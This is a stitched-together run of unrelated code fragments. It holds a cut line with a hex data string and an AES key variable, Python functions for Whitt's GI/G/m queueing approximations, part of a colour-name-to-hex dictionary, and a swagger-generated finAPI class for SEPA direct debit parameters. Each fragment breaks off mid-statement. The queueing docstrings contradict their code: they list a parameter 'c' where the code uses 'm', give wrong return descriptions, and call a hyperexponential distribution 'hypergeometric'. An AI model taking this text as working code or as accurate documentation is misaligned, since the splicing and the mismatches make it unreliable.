rotation).""" data_string = "043E25020103008B98C54124F819181695FE5830B603D28B98C54124F8C3491476757E00000099DE" data = bytes(bytearray.fromhex(data_string)) aeskey
float average arrival rate to queueing system svc_rate : float average service rate (each server). 1/svc_rate is mean service time. c : int number of servers ca2 : float squared coefficient of variation for inter-arrival time distribution cs2 : float squared coefficient of variation for service time distribution Returns ------- float variance of conditional wait time in queue """ varsojourn = ggm_sojourn_whitt_var(arr_rate, svc_rate, m, ca2, cs2) meansojourn = ggm_mean_sojourn_whitt(arr_rate, svc_rate, m, ca2, cs2) cv2 = varsojourn / meansojourn ** 2 return cv2 def ggm_mean_qsize_whitt(arr_rate, svc_rate, m, ca2, cs2): """ Return the approximate mean queue size in GI/G/c/inf queue using Whitt's 1993 approximation and Little's Law. See <NAME>. "Approximations for the GI/G/m queue" Production and Operations Management 2, 2 (Spring 1993): 114-161. It's based on interpolations with corrections between an M/D/c, D/M/c and a M/M/c queueing systems. Parameters ---------- arr_rate : float average arrival rate to queueing system svc_rate : float average service rate (each server). 1/svc_rate is mean service time. c : int number of servers ca2 : float squared coefficient of variation for inter-arrival time distribution cs2 : float squared coefficient of variation for service time distribution Returns ------- float mean wait time in queue """ # Use Eq 2.24 on p 125 to compute mean wait time in queue qwait = ggm_mean_qwait_whitt(arr_rate, svc_rate, m, ca2, cs2) # Now use Little's Law return qwait * arr_rate def ggm_mean_syssize_whitt(arr_rate, svc_rate, m, ca2, cs2): """ Return the approximate mean system size in GI/G/c/inf queue using Whitt's 1993 approximation and Little's Law. See <NAME>. "Approximations for the GI/G/m queue" Production and Operations Management 2, 2 (Spring 1993): 114-161. It's based on interpolations with corrections between an M/D/c, D/M/c and a M/M/c queueing systems. Parameters ---------- arr_rate : float average arrival rate to queueing system svc_rate : float average service rate (each server). 1/svc_rate is mean service time. c : int number of servers ca2 : float squared coefficient of variation for inter-arrival time distribution cs2 : float squared coefficient of variation for service time distribution Returns ------- float mean wait time in queue """ # Use Eq 2.24 on p 125 to compute mean wait time in queue mean_sojourn = ggm_mean_sojourn_whitt(arr_rate, svc_rate, m, ca2, cs2) # Now use Little's Law return mean_sojourn * arr_rate def dmm_mean_qwait_whitt(arr_rate, svc_rate, m, ca2=0.0, cs2=1.0): """ Return the approximate mean queue size in D/M/m/inf queue using Whitt's 1993 approximation. See Whitt, Ward. "Approximations for the GI/G/m queue" Production and Operations Management 2, 2 (Spring 1993): 114-161. Specifically, this approximation is Eq 2.20 on p124. This, along with mdm_mean_qwait_whitt are refinements of the Cosmetatos approximations. Parameters ---------- arr_rate : float average arrival rate to queueing system svc_rate : float average service rate (each server). 1/svc_rate is mean service time. c : int number of servers ca2 : float squared coefficient of variation for inter-arrival time distribution (0 for D) cs2 : float squared coefficient of variation for service time distribution (1 for M) Returns ------- float mean wait time in queue """ rho = arr_rate / (svc_rate * float(m)) # Now implement Eq 2.20 on p 124 term1 = _ggm_mean_qwait_whitt_phi_3(m, rho) term2 = 0.5 * (ca2 + cs2) term3 = mmc_mean_qwait(arr_rate, svc_rate, m) return term1 * term2 * term3 def mdm_mean_qwait_whitt(arr_rate, svc_rate, m, ca2=0.0, cs2=1.0): """ Return the approximate mean queue size in M/D/m/inf queue using Whitt's 1993 approximation. See <NAME>. "Approximations for the GI/G/m queue" Production and Operations Management 2, 2 (Spring 1993): 114-161. Specifically, this approximation is Eq 2.16 on p124. This, along with dmm_mean_qwait_whitt are refinements of the Cosmetatos approximations. Parameters ---------- arr_rate : float average arrival rate to queueing system svc_rate : float average service rate (each server). 1/svc_rate is mean service time. c : int number of servers ca2 : float squared coefficient of variation for inter-arrival time distribution (0 for D) cs2 : float squared coefficient of variation for service time distribution (1 for M) Returns ------- float mean wait time in queue """ rho = arr_rate / (svc_rate * float(m)) # Now implement Eq 2.16 on p 124 term1 = _ggm_mean_qwait_whitt_phi_1(m, rho) term2 = 0.5 * (ca2 + cs2) term3 = mmc_mean_qwait(arr_rate, svc_rate, m) return term1 * term2 * term3 def fit_balanced_hyperexpon2(mean, cs2): """ Return the branching probability and rates for a balanced H2 distribution based on a specified mean and scv. Intended for scv's > 1. See <NAME>. "Approximations for the GI/G/m queue" Production and Operations Management 2, 2 (Spring 1993): 114-161. Parameters ---------- cs2 : float squared coefficient of variation for desired distribution Returns ------- tuple (float p, float rate1, float rate2) branching probability and exponential rates """ p1 = 0.5 * (1 + np.sqrt((cs2-1) / (cs2+1))) p2 = 1 - p1 mu1 = 2 * p1 / mean mu2 = 2 * p2 / mean return (p1, mu1, mu2) def hyperexpon_cdf(x, probs, rates): """ Return the P(X < x) where X is hypergeometric with probabilities and exponential rates in lists probs and rates. Parameters ---------- probs : list of floats branching probabilities for hyperexponential probs : list of floats exponential rates Returns ------- float P(X<x) where X~hyperexponetial(probs, rates) """ sumproduct = sum([p * np.exp(-r * x) for (p, r) in zip(probs, rates)]) prob_lt_x = 1.0 - sumproduct return prob_lt_x def ggm_qcondwait_cdf_whitt(t, arr_rate, svc_rate, c, ca2, cs2): """ Return the approximate P(D <= t) where D = (W|W>0) in G/G/m queue using Whitt's two moment approximation. See Section 4 of <NAME>. "Approximations for the GI/G/m queue" Production and Operations Management 2, 2 (Spring 1993): 114-161. It's based on an approach he originally used for G/G/1 queues in QNA. There are different cases based on the value of an approximation for the scv of D. Parameters ---------- t : float wait time of interest arr_rate : float average arrival rate to queueing system svc_rate : float average service rate (each server). 1/svc_rate is mean service time. c : int number of servers cv2_svc_time : float squared coefficient of variation for service time distribution Returns ------- float ~ P(D <= t | ) """ rho = arr_rate / (svc_rate * float(c)) ed = ggm_mean_qwait_whitt(arr_rate, svc_rate, c, ca2, cs2) / ggm_prob_wait_whitt(arr_rate, svc_rate, c, ca2, cs2) cd2 = ggm_qcondwait_whitt_cd2(rho,cs2) if cd2 > 1.01: # Hyperexponential approx p1, gamma1, gamma2 = fit_balanced_hyperexpon2(ed, cd2) p2 = 1.0 - p1 prob_wait_ltx = hyperexpon_cdf(t, [p1,p2], [gamma1, gamma2]) elif cd2 >= 0.99 and cd2 <= 1.01: # Exponential approx prob_wait_ltx = stats.expon.cdf(t,scale=ed) elif cd2 >= 0.501 and cd2 < 0.99: # Convolution of two exponentials approx vard = ggm_qcondwait_whitt_vard(arr_rate, svc_rate, c, ca2, cs2) gamma2 = 2.0 / (ed + np.sqrt(2 * vard - ed ** 2)) gamma1 = 1.0 / (ed - 1.0 / gamma2) prob_wait_gtx = (gamma1 * np.exp(-gamma2 * t) - gamma2 * np.exp(-gamma1 * t)) / (gamma1 - gamma2) prob_wait_ltx = 1.0 - prob_wait_gtx else: # Erlang approx gamma1 = 2.0 / ed prob_wait_gtx = np.exp(-gamma1 * t) * (1.0 + gamma1 * t) prob_wait_ltx = 1.0 - prob_wait_gtx return prob_wait_ltx def ggm_qwait_cdf_whitt(t, arr_rate, svc_rate, c, ca2, cs2): """ Return the approximate P(W <= t) in G/G/m queue using Whitt's two moment approximation for conditional wait and the P(W>0). See Section 4 of Whitt, Ward. "Approximations for the GI/G/m queue" Production and Operations Management 2, 2 (Spring 1993): 114-161. See ggm_qcondwait_cdf_whitt for more details. Parameters ---------- t : float wait time of interest arr_rate : float average arrival rate to queueing system svc_rate : float average service rate (each server). 1/svc_rate is mean service time. c : int number of servers cv2_svc_time : float squared coefficient of variation for service time distribution Returns ------- float ~ P(W <= t | ) """ qcondwait = ggm_qcondwait_cdf_whitt(t, arr_rate, svc_rate, c, ca2, cs2) pdelay = ggm_prob_wait_whitt(arr_rate, svc_rate, c, ca2, cs2) qwait = qcondwait * pdelay + (1.0 - pdelay) return qwait def ggm_qwait_pctile_whitt(p, arr_rate, svc_rate, c, ca2,
"Big Sky": 0xCDE2DE, "Big Spender": 0xACDDAF, "Big Stone": 0x334046, "Big Stone Beach": 0x886E54, "Big Sur": 0xB3CADC, "Big Sur Blue Jade": 0x3F6E8E, "Big Surf": 0x96D0D1, "Big Yellow Streak": 0xFFEE22, "Big Yellow Taxi": 0xFFFF33, "Bigfoot": 0x715145, "Bighorn Sheep": 0x20120E, "Bijou Blue": 0x4E5E7F, "Bijou Red": 0xA33D3B, "Bijoux Green": 0x676B55, "Biking Red": 0x77212E, "Biking Trail": 0xC3C0B1, "Bilbao": 0x3E8027, "Bilberry": 0x71777E, "Bile": 0xB5C306, "Bilious Brown": 0xE39F08, "Bilious Green": 0xA9D171, "Billabong": 0x1B6F81, "Billet": 0xAD7C35, "Billiard": 0x00AA92, "Billiard Ball": 0x276B40, "Billiard Green": 0x305A4A, "Billiard Room": 0x50846E, "Billiard Table": 0x155843, "Billowing Clouds": 0xD8DEE3, "Billowing Sail": 0xD8E7E7, "Billowing Smoke": 0x6E726A, "Billowy Breeze": 0xAFC7CD, "Billowy Clouds": 0xF6F0E9, "Billowy Down": 0xEFF0E9, "Billycart Blue": 0x4C77A4, "Biloba Flower": 0xAE99D2, "Biloxi": 0xF4E4CD, "Biloxi Blue": 0x0075B8, "Biltmore Buff": 0xE3C9A1, "Biltong": 0x410200, "Bimini Blue": 0x007A91, "Binary Star": 0x616767, "Bindi Dot": 0x8B3439, "Bindi Red": 0xB0003C, "Bing Cherry Pie": 0xAF4967, "Binrouji Black": 0x433D3C, "Bio Blue": 0x465F9E, "Biogenic Sand": 0xFFEFD5, "Biohazard Suit": 0xFBFB4C, "Biology Experiments": 0x91A135, "Bioluminescence": 0x55EEFF, "BioShock": 0x889900, "Biotic Grasp": 0xEEEE44, "Biotic Orb": 0xEEDD55, "Birch": 0x3F3726, "Birch Beige": 0xD9C3A1, "Birch Forest": 0x899A8B, "Birch Leaf Green": 0x637E1D, "Birch Strain": 0xDFB45F, "Birch White": 0xF6EEDF, "Birchwood": 0xCCBEAC, "Birchy Woods": 0x806843, "Bird Blue": 0x7B929E, "Bird Blue Grey": 0x7F92A0, "Bird Flower": 0xD0C117, "Bird Of Paradise": 0x0083A8, "Bird's Child": 0xFFF1CF, "Bird's Egg Green": 0xAACCB9, "Bird's Nest": 0xCFBB9B, "Bird’s Eye": 0xB9030A, "Birdhouse Brown": 0x6C483A, "Birdie": 0xE9E424, "Birdie Num Num": 0x89ACDA, "Birdseed": 0xE2C28E, "Birdseye Maple": 0xE4C495, "Biro Blue": 0x2F3946, "Birōdo Green": 0x224634, "Birth of a Star": 0xFCE9DF, "Birthday Cake": 0xE9D2CC, "Birthday Candle": 0xCFA2AD, "Birthday King": 0x9BDCB9, "Birthday Suit": 0xE2C7B6, "Birthstone": 0x79547A, "Biscay": 0x2F3C53, "Biscay Bay": 0x097988, "Biscay Green": 0x55C6A9, "Biscotti": 0xDAC7AB, "Biscuit": 0xFEEDCA, "Biscuit Beige": 0xE6BFA6, "Biscuit Cream": 0xF9CCB7, "Biscuit Dough": 0xE8DBBD, "Bishop Red": 0xC473A9, "Bismarck": 0x486C7A, "Bison": 0x6E4F3A, "Bison Beige": 0x9F9180, "Bison Brown": 0x584941, "Bison Hide": 0xB5AC94, "Bisque": 0xFFE4C4, "Bisque Tan": 0xE5D2B0, "Bistre": 0x3D2B1F, "Bistre Brown": 0x967117, "Bistro": 0x705950, "Bistro Green": 0x395551, "Bit of Berry": 0xDD5599, "Bit of Blue": 0xE2EAEB, "Bit of Heaven": 0xCAD7DE, "Bit of Lime": 0xE1E5AC, "Bit of Sugar": 0xF4F2EC, "Bitcoin": 0xFFBB11, "Bite the Bullet": 0xECEBCE, "Bitter": 0x88896C, "Bitter Briar": 0x8D7470, "Bitter Chocolate": 0x9E5B40, "Bitter Clover Green": 0x769789, "Bitter Dandelion": 0x6ECB3C, "Bitter Lemon": 0xD2DB32, "Bitter Lime": 0xCFFF00, "Bitter Melon": 0xCFD1B2, "Bitter Orange": 0xD5762B, "Bitter Sage": 0x97A18D, "Bitter Violet": 0x856D9E, "Bittersweet": 0xFEA051, "Bittersweet Shimmer": 0xBF4F51, "Bittersweet Stem": 0xCBB49A, "Bizarre": 0xE7D2C8, "Black": 0x000000, "Black Bamboo": 0x5B5D53, "Black Bay": 0x474A4E, "Black Bean": 0x4E4B4A, "Black Beauty": 0x26262A, "Black Blueberry": 0x2F2F48, "Black Boudoir": 0x454749, "Black Cat": 0x2E2F31, "Black Chestnut Oak": 0x252321, "Black Chocolate": 0x441100, "Black Coffee": 0x3B302F, "Black Coral": 0x54626F, "Black Dahlia": 0x4E434D, "Black Diamond Apple": 0x8A779A, "Black Dragon's Cauldron": 0x545562, "Black Drop": 0x90ABD9, "Black Elder": 0xA66E7A, "Black Elegance": 0x50484A, "Black Emerald": 0x12221D, "Black Evergreen": 0x45524F, "Black Feather": 0x112222, "Black Flame": 0x484B5A, "Black Forest": 0x5E6354, "Black Forest Blue": 0x29485A, "Black Forest Green": 0x424740, "Black Fox": 0x4F4842, "Black Garnet": 0x4E4444, "Black Glaze": 0x001111, "Black Green": 0x384E49, "Black Grey": 0x24272E, "Black Haze": 0xE0DED7, "Black Headed Gull": 0x9C856C, "Black Hills Gold": 0xC89180, "Black Hole": 0x010203, "Black Htun": 0x110033, "Black Ice": 0x4D5051, "Black Ink": 0x44413C, "Black Iris": 0x2B3042, "Black Is Beautiful": 0x552222, "Black Jasmine Rice": 0x74563D, "Black Kite": 0x351E1C, "Black Knight": 0x010B13, "Black Lacquer": 0x3F3E3E, "Black Lead": 0x474C4D, "Black Leather Jacket": 0x253529, "Black Licorice": 0x3A3B3B, "Black Locust": 0x646763, "Black Magic": 0x4F4554, "Black Mana": 0x858585, "Black Market": 0x222244, "Black Marlin": 0x383740, "Black Mesa": 0x222211, "Black Metal": 0x060606, "Black Mocha": 0x4B4743, "Black Oak": 0x4E4F4E, "Black of Night": 0x323639, "Black Olive": 0x3B3C36, "Black Onyx": 0x2B272B, "Black Orchid": 0x525463, "Black Out": 0x222222, "Black Panther": 0x424242, "Black Pearl": 0x1E272C, "Black Pine Green": 0x33654A, "Black Plum": 0x6C5765, "Black Pool": 0x4F5552, "Black Powder": 0x34342C, "Black Power": 0x654B37, "Black Pudding": 0xA44A56, "Black Queen": 0x694D27, "Black Raspberry": 0x16110D, "Black Ribbon": 0x484C51, "Black River Falls": 0x343E54, "Black Rock": 0x2C2D3C, "Black Rooster": 0x331111, "Black Rose": 0x532934, "Black Russian": 0x24252B, "Black Sabbath": 0x220022, "Black Sable": 0x434B4D, "Black Safflower": 0x302833, "Black Sand": 0x5B4E4B, "Black Sapphire": 0x434555, "Black Shadows": 0xBFAFB2, "Black Sheep": 0x0F0D0D, "Black Slug": 0x332211, "Black Smoke": 0x3E3E3F, "Black Soap": 0x19443C, "Black Space": 0x545354, "Black Spruce": 0x4C5752, "Black Squeeze": 0xE5E6DF, "Black Suede": 0x434342, "Black Swan": 0x332200, "Black Tie": 0x464647, "Black Tortoise": 0x353235, "Black Truffle": 0x463D3E, "Black Velvet": 0x222233, "Black Violet": 0x2B2C42, "Black Walnut": 0x5E4F46, "Black Wash": 0x0C0C0C, "Black Water": 0x2E4846, "Black White": 0xE5E4DB, "Blackadder": 0x292C2C, "Blackberry": 0x43182F, "Blackberry Black": 0x2E2848, "Blackberry Burgundy": 0x4C3938, "Blackberry Cobbler": 0x404D6A, "Blackberry Cordial": 0x3F2A47, "Blackberry Cream": 0xD9D3DA, "Blackberry Deep Red": 0x633654, "Blackberry Farm": 0x62506B, "Blackberry Harvest": 0x504358, "Blackberry Jam": 0x87657E, "Blackberry Leaf Green": 0x507F6D, "Blackberry Mocha": 0xA58885, "Blackberry Pie": 0x64242E, "Blackberry Sorbet": 0xC1A3B9, "Blackberry Tint": 0x8F5973, "Blackberry Wine": 0x4D3246, "Blackberry Yogurt": 0xE5BDDF, "Blackbird": 0x3F444C, "Blackbird's Ggg": 0xFCE7E4, "Blackboard Green": 0x274C43, "Blackcurrant": 0x2E183B, "Blackcurrant Conserve": 0x52383D, "Blackcurrant Elixir": 0x5C4F6A, "Blackened Brown": 0x442200, "Blackened Pearl": 0x4D4B50, "Blackest Berry": 0x662266, "Blackest Brown": 0x403330, "Blackfire Earth": 0x7A5901, "Blackheath": 0x49454B, "Blackish Brown": 0x453B32, "Blackish Green": 0x5D6161, "Blackish Grey": 0x5B5C61, "Blackjack": 0x51504D, "Blacklist": 0x221133, "Blackmail": 0x220066, "Blackout": 0x0E0702, "Blackthorn Berry": 0x8470FF, "Blackthorn Blue": 0x4C606B, "Blackthorn Green": 0x739C69, "Blackwater": 0x545663, "Blackwater Park": 0x696268, "Blade Green": 0x6A9266, "Bladed Grass": 0x758269, "Bladerunner": 0x6A8561, "Blair": 0xA1BDE0, "Blanc": 0xD9D0C2, "Blanc Cassé": 0xF1EEE2, "Blanc De Blanc": 0xE7E9E7, "Blanca Peak": 0xF8F9F4, "Blanched Almond": 0xFFEBCD, "Blanched Driftwood": 0xCCBEB6, "Bland": 0xAFA88B, "Blank Canvas": 0xFFEFD6, "Blanka Green": 0x9CD33C, "Blanket Brown": 0x9E8574, "Blarney": 0x00A776, "Blarney Stone": 0x027944, "Blast-Off Bronze": 0xA57164, "Blasted Lands Rocks": 0x6C3550, "Blaze": 0xFA8C4F, "Blaze Orange": 0xFE6700, "Blazing Autumn": 0xF3AD63, "Blazing Bonfire": 0xFFA035, "Blazing Orange": 0xFFA64F, "Blazing Yellow": 0xFEE715, "Bleach White": 0xEBE1CE, "Bleached Almond": 0xF3EAD5, "Bleached Apricot": 0xFCCAAC, "Bleached Aqua": 0xBCE3DF, "Bleached Bare": 0xD0C7C3, "Bleached Bark": 0x8B7F78, "Bleached Bone": 0xEFD9A8, "Bleached Cedar": 0x2C2133, "Bleached Coral": 0xFFD6D1, "Bleached Denim": 0x646F9B, "Bleached Grey": 0x788878, "Bleached Jade": 0xE2E6D1, "Bleached Linen": 0xF3ECE1, "Bleached Maple": 0xC7A06C, "Bleached Meadow": 0xEAE5D5, "Bleached Sand": 0xDACCB4, "Bleached Shell": 0xF6E5DA, "Bleached Silk": 0xF3F3F2, "Bleached Spruce": 0xBAD7AE, "Bleached Wheat": 0xDDD2A9, "Bleached White": 0xDFE3E8, "Bleaches": 0xC7C7C3, "Bleeding Heart": 0xC02E4C, "Blende Blue": 0xA9C4C4, "Blended Fruit": 0xF8E3A4, "Blended Light": 0xFFFBE8, "Blessed Blue": 0x4499CC, "Bleu Ciel": 0x007BA1, "Bleu De France": 0x318CE7, "Bleu Nattier": 0x9CC2BF, "Bleuchâtel Blue": 0x4488FF, "Blind Date": 0xBCAEA1, "Blind Forest": 0x223300, "Bling Bling": 0xEEF0CE, "Blinking Blue": 0x0033FF, "Blinking Terminal": 0x66CC00, "Bliss Blue": 0x7AC7E1, "Blissful": 0xDDC4D4, "Blissful Berry": 0xAA1188, "Blissful Blue": 0xB2C8D8, "Blissful Light": 0xE5D2DD, "Blissful Meditation": 0xD5DAEE, "Blissful Orange": 0xFFAC39, "Blissful Serenity": 0xEAEED8, "Blissfully Mine": 0xDAB6CD, "Blister Pearl": 0xAAFFEE, "Blithe": 0x0084BD, "Blithe Blue": 0x90BDBD, "Blizzard": 0xE5EBED, "Blizzard Blue": 0xA3E3ED, "Blobfish": 0xFFC1CC, "Blockchain Gold": 0xE8BC50, "Bloedworst": 0x560319, "Blond": 0xFAF0BE, "Blonde": 0xDCBD92, "Blonde Beauty": 0xF2EFCD, "Blonde Curl": 0xEFE2C5, "Blonde Girl": 0xEDC558, "Blonde Lace": 0xD6B194, "Blonde Shell": 0xF6EDCD, "Blonde Wood": 0xAB7741, "Blonde Wool": 0xE5D0B1, "Blood": 0x770001, "Blood Brother": 0x770011, "Blood Burst": 0xFF474C, "Blood Donor": 0xEA1822, "Blood God": 0x67080B, "Blood Mahogany": 0x543839, "Blood Moon": 0xD83432, "Blood Omen": 0x8A0303, "Blood Orange": 0xD1001C, "Blood Orange Juice": 0xFE4B03, "Blood Organ": 0x630F0F, "Blood Pact": 0x771111, "Blood Red": 0x980002, "Blood Rose": 0x73404D, "Blood Rush": 0xAA2222, "Blood Thorn": 0xB03060, "Bloodhound": 0xBB5511, "Bloodletter": 0xE97451, "Bloodline": 0x882200, "Bloodmyst Isle": 0xF02723, "Bloodstain": 0x772200, "Bloodstone": 0x413431, "Bloodthirsty": 0x880011, "Bloodthirsty Beige": 0xF8D7D0, "Bloodthirsty Vampire": 0x9B0503, "Bloodthirsty Warlock": 0xEC1837, "Bloodtracker Brown": 0x703F00, "Bloody Periphylla": 0xAA1144, "Bloody Pico-8": 0xFF004D, "Bloody Red": 0xCA1F1B, "Bloody Rust": 0xDA2C43, "Bloody Salmon": 0xCC4433, "Bloom": 0xFFAF75, "Blooming Aster": 0xD7E2EE, "Blooming Dahlia": 0xEB9687, "Blooming Lilac": 0xBA93AF, "Blooming Perfect": 0xD89696, "Blooming Wisteria": 0x88777E, "Bloomsberry": 0xA598C4, "Blossom": 0xFEE9D8, "Blossom Blue": 0xAACCEE, "Blossom Mauve": 0xA3A7CC, "Blossom Pink": 0xE6D5CE, "Blossom Powder": 0xC3B3B9, "Blossom Time": 0xE5D2C9, "Blossom White": 0xF2EEE4, "Blossom Yellow": 0xE1C77D, "Blossoms in Spring": 0xE79ACB, "Blouson Blue": 0x67B7C6, "Blowing Kisses": 0xF6DEE0, "Blowout": 0x658499, "Blue": 0x0000FF, "Blue Accolade": 0x25415D, "Blue Agave": 0xB1C6C7, "Blue Alps": 0x89A3AE, "Blue Android Base": 0x5A79BA, "Blue Angel": 0x0022DD, "Blue Angels Yellow": 0xF8B800, "Blue Angora": 0xA7CFCB, "Blue Antarctic": 0x4B789B, "Blue Anthracite": 0x555E64, "Blue Arc": 0x0085A1, "Blue Ash": 0x414654, "Blue Ashes": 0x3B5F78, "Blue Aster": 0x0077B3, "Blue Astro": 0x50A7D9, "Blue Atoll": 0x00B1D2, "Blue Aura": 0x6C7386, "Blue Azure": 0x4682BF, "Blue Ballad": 0x7498BD, "Blue Ballerina": 0xB4C7DB, "Blue Ballet": 0x576B6B, "Blue Bauble": 0xABDEE3, "Blue Bay": 0x619AD6, "Blue Bayberry": 0x2D5360, "Blue Bayou": 0xBEC4D3, "Blue Beads": 0x5A809E, "Blue Beauty": 0x7498BF, "Blue Beetle": 0x220099, "Blue Bell": 0x93B4D7, "Blue Beret": 0x40638E, "Blue
# coding: utf-8 """ finAPI RESTful Services finAPI RESTful Services # noqa: E501 OpenAPI spec version: v1.42.1 Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six from swagger_client.models.single_direct_debit_data import SingleDirectDebitData # noqa: F401,E501 class RequestSepaDirectDebitParams(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'account_id': 'int', 'banking_pin': 'str', 'two_step_procedure_id': 'str', 'direct_debit_type': 'str', 'sequence_type': 'str', 'execution_date': 'str', 'direct_debits': 'list[SingleDirectDebitData]' } attribute_map = { 'account_id': 'accountId', 'banking_pin': 'bankingPin', 'two_step_procedure_id': 'twoStepProcedureId', 'direct_debit_type': 'directDebitType', 'sequence_type': 'sequenceType', 'execution_date': 'executionDate', 'direct_debits': 'directDebits' } def __init__(self, account_id=None, banking_pin=None, two_step_procedure_id=None, direct_debit_type=None, sequence_type=None, execution_date=None, direct_debits=None): # noqa: E501 """RequestSepaDirectDebitParams - a model defined in Swagger""" # noqa: E501 self._account_id = None self._banking_pin = None self._two_step_procedure_id = None self._direct_debit_type = None self._sequence_type = None self._execution_date = None self._direct_debits = None self.discriminator = None self.account_id = account_id if banking_pin is not None: self.banking_pin = banking_pin if two_step_procedure_id is not None: self.two_step_procedure_id = two_step_procedure_id self.direct_debit_type = direct_debit_type self.sequence_type = sequence_type self.execution_date = execution_date self.direct_debits = direct_debits @property def account_id(self): """Gets the account_id of this RequestSepaDirectDebitParams. # noqa: E501 Identifier of the bank account to which you want to transfer the money. # noqa: E501 :return: The account_id of this RequestSepaDirectDebitParams. # noqa: E501 :rtype: int """ return self._account_id @account_id.setter def account_id(self, account_id): """Sets the account_id of this RequestSepaDirectDebitParams. Identifier of the bank account to which you want to transfer the money. # noqa: E501 :param account_id: The account_id of this RequestSepaDirectDebitParams. # noqa: E501 :type: int """ if account_id is None: raise ValueError("Invalid value for `account_id`, must not be `None`") # noqa: E501 self._account_id = account_id @property def banking_pin(self): """Gets the banking_pin of this RequestSepaDirectDebitParams. # noqa: E501 Online banking PIN. If a PIN is stored in the account's bank connection, then this field may remain unset. If the field is set though then it will always be used (even if there is some other PIN stored in the bank connection). # noqa: E501 :return: The banking_pin of this RequestSepaDirectDebitParams. # noqa: E501 :rtype: str """ return self._banking_pin @banking_pin.setter def banking_pin(self, banking_pin): """Sets the banking_pin of this RequestSepaDirectDebitParams. Online banking PIN. If a PIN is stored in the account's bank connection, then this field may remain unset. If the field is set though then it will always be used (even if there is some other PIN stored in the bank connection). # noqa: E501 :param banking_pin: The banking_pin of this RequestSepaDirectDebitParams. # noqa: E501 :type: str """ self._banking_pin = banking_pin @property def two_step_procedure_id(self): """Gets the two_step_procedure_id of this RequestSepaDirectDebitParams. # noqa: E501 The bank-given ID of the two-step-procedure that should be used for the direct debit order. For a list of available two-step-procedures, see the corresponding bank connection (GET /bankConnections). If this field is not set, then the bank connection's default two-step procedure will be used. Note that in this case, when the bank connection has no default two-step procedure set, then the service will return an error (see response messages for details). # noqa: E501 :return: The two_step_procedure_id of this RequestSepaDirectDebitParams. # noqa: E501 :rtype: str """ return self._two_step_procedure_id @two_step_procedure_id.setter def two_step_procedure_id(self, two_step_procedure_id): """Sets the two_step_procedure_id of this RequestSepaDirectDebitParams. The bank-given ID of the two-step-procedure that should be used for the direct debit order. For a list of available two-step-procedures, see the corresponding bank connection (GET /bankConnections). If this field is not set, then the bank connection's default two-step procedure will be used. Note that in this case, when the bank connection has no default two-step procedure set, then the service will return an error (see response messages for details). # noqa: E501 :param two_step_procedure_id: The two_step_procedure_id of this RequestSepaDirectDebitParams. # noqa: E501 :type: str """ self._two_step_procedure_id = two_step_procedure_id @property def direct_debit_type(self): """Gets the direct_debit_type of this RequestSepaDirectDebitParams. # noqa: E501 Type of the direct debit; either <code>BASIC</code> or <code>B2B</code> (Business-To-Business). Please note that an account which supports the basic type must not necessarily support B2B (or vice versa). Check the source account's 'supportedOrders' field to find out which types of direct debit it supports.<br/><br/> # noqa: E501 :return: The direct_debit_type of this RequestSepaDirectDebitParams. # noqa: E501 :rtype: str """ return self._direct_debit_type @direct_debit_type.setter def direct_debit_type(self, direct_debit_type): """Sets the direct_debit_type of this RequestSepaDirectDebitParams. Type of the direct debit; either <code>BASIC</code> or <code>B2B</code> (Business-To-Business). Please note that an account which supports the basic type must not necessarily support B2B (or vice versa). Check the source account's 'supportedOrders' field to find out which types of direct debit it supports.<br/><br/> # noqa: E501 :param direct_debit_type: The direct_debit_type of this RequestSepaDirectDebitParams. # noqa: E501 :type: str """ if direct_debit_type is None: raise ValueError("Invalid value for `direct_debit_type`, must not be `None`") # noqa: E501 allowed_values = ["B2B", "BASIC"] # noqa: E501 if direct_debit_type not in allowed_values: raise ValueError( "Invalid value for `direct_debit_type` ({0}), must be one of {1}" # noqa: E501 .format(direct_debit_type, allowed_values) ) self._direct_debit_type = direct_debit_type @property def sequence_type(self): """Gets the sequence_type of this RequestSepaDirectDebitParams. # noqa: E501 Sequence type of the direct debit. Possible values:<br/><br/>&bull; <code>OOFF</code> - means that this is a one-time direct debit order<br/>&bull; <code>FRST</code> - means that this is the first in a row of multiple direct debit orders<br/>&bull; <code>RCUR</code> - means that this is one (but not the first or final) within a row of multiple direct debit orders<br/>&bull; <code>FNAL</code> - means that this is the final in a row of multiple direct debit orders<br/><br/> # noqa: E501 :return: The sequence_type of this RequestSepaDirectDebitParams. # noqa: E501 :rtype: str """ return self._sequence_type @sequence_type.setter def sequence_type(self, sequence_type): """Sets the sequence_type of this RequestSepaDirectDebitParams. Sequence type of the direct debit. Possible values:<br/><br/>&bull; <code>OOFF</code> - means that this is a one-time direct debit order<br/>&bull; <code>FRST</code> - means that this is the first in a row of multiple direct debit orders<br/>&bull; <code>RCUR</code> - means that this is one (but not the first or final) within a row of multiple direct debit orders<br/>&bull; <code>FNAL</code> - means that this is the final in a row of multiple direct debit orders<br/><br/> # noqa: E501 :param sequence_type: The sequence_type of this RequestSepaDirectDebitParams. # noqa: E501 :type: str """ if sequence_type is None: raise ValueError("Invalid value for `sequence_type`, must not be `None`") # noqa: E501 allowed_values = ["OOFF", "FRST", "RCUR", "FNAL"] # noqa: E501 if sequence_type not in allowed_values: raise ValueError( "Invalid value for `sequence_type` ({0}), must be one of {1}" # noqa: E501 .format(sequence_type, allowed_values) ) self._sequence_type = sequence_type @property def execution_date(self): """Gets the execution_date of this RequestSepaDirectDebitParams. # noqa: E501 Execution date for the direct debit(s), in the format 'yyyy-MM-dd'. # noqa: E501 :return: The execution_date of this RequestSepaDirectDebitParams. # noqa: E501 :rtype: str """ return self._execution_date @execution_date.setter def execution_date(self, execution_date): """Sets the execution_date of this RequestSepaDirectDebitParams. Execution date for the direct debit(s), in the format 'yyyy-MM-dd'. # noqa: E501 :param execution_date: The execution_date of this RequestSepaDirectDebitParams. # noqa: E501 :type: str """ if execution_date is None: raise ValueError("Invalid value for `execution_date`, must not be `None`") # noqa: E501 self._execution_date = execution_date @property def direct_debits(self): """Gets the direct_debits of this RequestSepaDirectDebitParams. # noqa: E501 List of the direct debits that you want to execute. Please check the account's 'supportedOrders' field to find out whether you can pass multiple direct debits or just one. # noqa: E501 :return: The direct_debits of this RequestSepaDirectDebitParams. # noqa: E501 :rtype: list[SingleDirectDebitData] """ return self._direct_debits @direct_debits.setter def direct_debits(self, direct_debits): """Sets the direct_debits of this RequestSepaDirectDebitParams. List of the direct debits that you want to execute. Please check the account's 